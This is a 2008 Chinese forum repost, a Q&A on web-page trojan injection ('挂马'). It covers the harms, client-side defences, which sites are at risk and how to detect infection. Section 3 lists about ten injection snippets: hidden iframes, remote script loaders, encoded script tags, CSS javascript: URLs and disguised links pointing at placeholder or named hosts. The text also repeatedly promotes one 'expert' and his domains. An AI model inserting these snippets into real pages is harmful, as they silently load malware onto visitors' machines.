打印

迎奥运,学技术

本主题由 ●′韓唄唄丶 于 2008-4-26 13:57 移动

迎奥运,学技术

2008年北京奥运会的脚步越来越近了。通过网络,我们可以知晓很多信息,和所有热爱
祖国的人们一样,我们热切的关注着奥运会。
国家的体育跟国外有得拼,国家的信息安全呢?
我们的网站,我们的电脑呢? 下面是我见到的,转载下,大家一起学习,提高水平。
1、网页被挂马后是否有危害?危害有多大?
答:网页被挂马,在一定程度上可以说是网页被篡改,但是比较隐蔽。危害很大。对服
务器端来说,一方面是系统资源,流量带宽资源的巨大损失,另一方面也成为了传播网
页木马的“傀儡帮凶”,严重影响到网站的公众信誉度;对客户端来说,很多网页木马
都是利益驱动,偷盗各类帐号密码,如电子银行帐户和密码、游戏帐号和密码、邮箱帐
户和密码、QQ/MSN 帐号和密码等;另外,使得客户端被安装恶意插件,强迫浏览黑客
指定的网站;或者被利用攻击某个站点等。
目前流行的“游戏信使”(盗用各类网游帐号密码)也都是依靠网页挂马攻击来实现的
。在主动越来越困难的情况下,利用网页木马进行攻击已经成为目前最为流行的黑客攻
击手段,所以应引起足够重视!
2、常见客户端防网页木马都有哪些好办法?
答:概括起来,大致有4钟常见办法:
(1)安装微软Windows和IE的最新补丁。
由于各类漏洞会不断地被发现,而一些严重性较高的漏洞在发现后不久就会有相应的病
毒出现。所以即时安装补丁可以降低病毒入侵的可能性。可以通过Windows Update获取
最新的补丁包,对于浏览器来说,可禁用部分控件和脚本等安全性设置。
(2)使用杀毒软件,并升级到最新的病毒库。
较新的病毒库可以识别出部分木马,并阻断恶意代码在本地运行,可大大降低感染木马
的可能性。
(3)养成良好的上网习惯,不要随便浏览信用度不高的网站。
网络上的各种网站鱼目混杂,有很多陷阱等着浏览者上钩。
(4)尽量在较大网站下载软件或浏览图片。
很多网站由于利益的驱动,有的在软件中捆绑了广告软件,有的甚至在软件中直接加入
木马。更有甚者,黑客在成功入侵了一个软件下载网站后,很可能替换人们最为常用的
软件,危害很大,影响面更广。

3、服务器通常都有哪些常见挂马方式?
答:陈十三哥说,关于挂马方法教程以及网页木马自动生成器等互联网上较多,这里就
几个常见的进行列举:

(1)框架挂马
<iframe src=地址 width=0 height=0></iframe>
地址可以是 http://www.juntuan.net
(2)js文件挂马
首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js, 则JS挂马代码为
<script language=javascript src=xxx.js></script>
(3)js变形加密
<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
(4)body挂马
<body ></body>
(5)隐蔽挂马
top.document.body.innerHTML = top.document.body.innerHTML + '\r\n<iframe
src="http://www.xxx.com/muma.htm/"></iframe>';
这里xx.com可以是http://www.chen13.com
(6)css中挂马
body {
background-image: url('javascript:document.write("<script
src=http://www.XXX.net/muma.js></script>")')}
这里是 xxx.net可以是 http://www.juntuan.net
(7)javascript挂马
<SCRIPT language=javascript>
window.open ("地
址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scro
llbars=no,width=1,height=1");
</script>
(8)图片伪装
<html>
<iframe src="网马地址" height=0 width=0></iframe>
<img src="图片地址"></center>
</html>
(9)伪装调用
<frameset rows="444,0" cols="*">
<frame src="打开网页" framborder="no" scrolling="auto" noresize
marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no" noresize
marginwidth="0"margingheight="0">
</frameset>
(10)高级欺骗
<a href="http://www.chen13.cn(迷惑连接地址,显示这个地址指向木马地址)" > 页
面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_chen13_com ()
{
var url="网马地址";
open
(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,menubar=no
,scrollbars=no,
resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
网马地址好比是http://www.chen13.cn/index.php
其他的方法还有很多,这里不一一介绍了。
4、哪些类型网站最容易被挂马
答:应该说各大中型网站均有被挂马的可能,事实也证明国内多个大型站点都曾被挂马
,由于系统漏洞、网站实现代码缺陷(如SQL注入、论坛代码缺陷、跨站脚本等)、或
网站提供Web服务的程序漏洞、IIS漏洞、Apache漏洞等都有被挂马的可能;访问量越大
的网站越有被挂马的可能,因为此类网站被黑客关注程度较高;另外就是各类政府网站
、各大中型企业网站,由于专业性技术人员缺乏,网站大多由第三方公司外包开发,存
在缺陷较多,也最容易被挂马。
5、服务器被挂马,如何才能发现?
答:服务器被挂马,通常情况下,若出现诸如“弹出页面”,则可以比较容易发现,发
现防病毒软件告警之类,则可以发现服务器被挂马;由于漏洞不断更新,挂马种类时刻
都在变换,通过客户端的反映来发现服务器是否被挂马往往疏漏较大;正确的做法是经
常性的检查服务器日志,发现异常信息,经常检查网站代码,借助于专业的检测工具来
发现网页木马会大大提高工作效率和准确度。著名安全专家陈十三哥指出:大多数公司
的网管仅仅是程序人员和网页设计人员,对安全涉猎有限。而且,网络是否安全,有时
并不是网络所有者自己完全清楚的。所以,许多公司要请第三方评估机构或专家来完成
对网络安全的评估。这样做的好处是:能对自己所处的环境有个更加清醒的认识,把未
来可能的风险降到最小。目前网络安全评估的中介机构,在国外已经开始将网络的安全
评估作为一个新的服务项目向社会推出。作为一种新兴的业务,其影响是否能象会计师
事务所、审计师事务所之类的中介机构那样重要,尚需拭目以待。但有一点可以肯定,
那就是网络上的商机同样也与风险同存。要想获得利润,就必须将安全问题解决.
6、网页木马检测主要应用于哪些场所?
答:木马检测主要针对Web服务器端网站编写代码进行检测,发现隐藏在数以万行的代
码中的网页木马,另外,还可以检测出代码中的缺陷或漏洞所在,这些漏洞可能是网页
木马被成功加载的原因,应提早加以防范,提高网站整体安全性,尤其是大型网站需要
定期进行代码检测,大型网站由于访问量巨大,因而得到黑客的格外“关注”;此外,
“掘马”还支持日志检测,找出黑客入侵的蛛丝马迹,为黑客追踪,法律取证等提供有
力证据。


7、中毒了,被黑了,我们应该怎么办?
答:在网络攻击成倍增长的今天,网络反黑客保安全已经成为每个计算机用户的必备课
程。欲成为成功的信息安全专业人士,不仅需要不断更新最尖端的安全知识,还需要对
商务过程和风险管理有深刻认识.2008年北京奥运会的脚步越来越近了。通过网络,我
们可以知晓很多信息,和所有热爱祖国的人们一样,我们热切的关注着奥运会。同时,
我们还可以通过网络来学习。
病毒木马猖狂,装了杀毒软件也不顶事。帐户和密码总是丢失,为什么呢? 电脑和网
络,你真的精通么?
防火墙和反病毒软件,真的 能保证你的安全么?
中毒了,被黑了,你思考过为什么么?
著名安全专家陈十三哥指出:“网络永远是不安全的,这个原因是多方面的。我们只有
不断的学习和掌握最新的 黑客安全技术,才能知己知彼,保证自己电脑和信息的相对
安全。”
學到知識了.:dtbq006